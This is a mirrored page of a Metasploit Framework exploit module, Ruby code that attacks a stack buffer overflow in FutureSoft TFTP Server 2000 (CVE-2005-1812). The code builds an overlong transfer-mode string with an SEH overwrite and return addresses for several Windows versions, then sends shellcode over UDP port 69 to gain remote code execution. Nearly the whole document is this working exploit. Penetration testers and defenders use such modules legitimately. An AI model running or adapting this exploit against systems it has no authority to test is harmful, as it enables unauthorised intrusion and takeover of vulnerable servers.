CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/tftp/futuresoft_transfermode.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Udp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow',

15
      'Description'    => %q{

16
          This module exploits a stack buffer overflow in the FutureSoft TFTP Server

17
        2000 product. By sending an overly long transfer-mode string, we were able

18
        to overwrite both the SEH and the saved EIP. A subsequent write-exception

19
        that will occur allows the transferring of execution to our shellcode

20
        via the overwritten SEH. This module has been tested against Windows

21
        2000 Professional and for some reason does not seem to work against

22
        Windows 2000 Server (could not trigger the overflow at all).

23
      },

24
      'Author'         => 'MC',

25
      'References'     =>

26
        [

27
          ['CVE', '2005-1812'],

28
          ['OSVDB', '16954'],

29
          ['BID', '13821']

30


31
        ],

32
      'DefaultOptions' =>

33
        {

34
          'EXITFUNC' => 'process',

35
        },

36
      'Payload'        =>

37
        {

38
          'Space'    => 350,

39
          'BadChars' => "\x00",

40
          'StackAdjustment' => -3500,

41
        },

42
      'Platform'       => 'win',

43
      'Targets'        =>

44
        [

45
          ['Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4} ], # ws2help.dll

46
          ['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad} ], # ws2help.dll

47
          ['Windows NT SP5/SP6a English',    { 'Ret' => 0x776a1799} ], # ws2help.dll

48
          ['Windows 2003 Server English',    { 'Ret' => 0x7ffc0638} ], # PEB return

49
        ],

50
      'Privileged'     => true,

51
      'DisclosureDate' => '2005-05-31'))

52


53
    register_options(

54
      [

55
        Opt::RPORT(69)

56
      ])

57


58
  end

59


60
  def exploit

61
    connect_udp

62


63
    print_status("Trying target #{target.name}...")

64


65
    sploit  = "\x00\x01" + rand_text_english(14, payload_badchars) + "\x00"

66
    sploit += rand_text_english(167, payload_badchars)

67
    seh  = generate_seh_payload(target.ret)

68
    sploit[157, seh.length] = seh

69
    sploit += "\x00"

70


71
    udp_sock.put(sploit)

72


73
    handler

74
    disconnect_udp

75
  end

76
end

77


78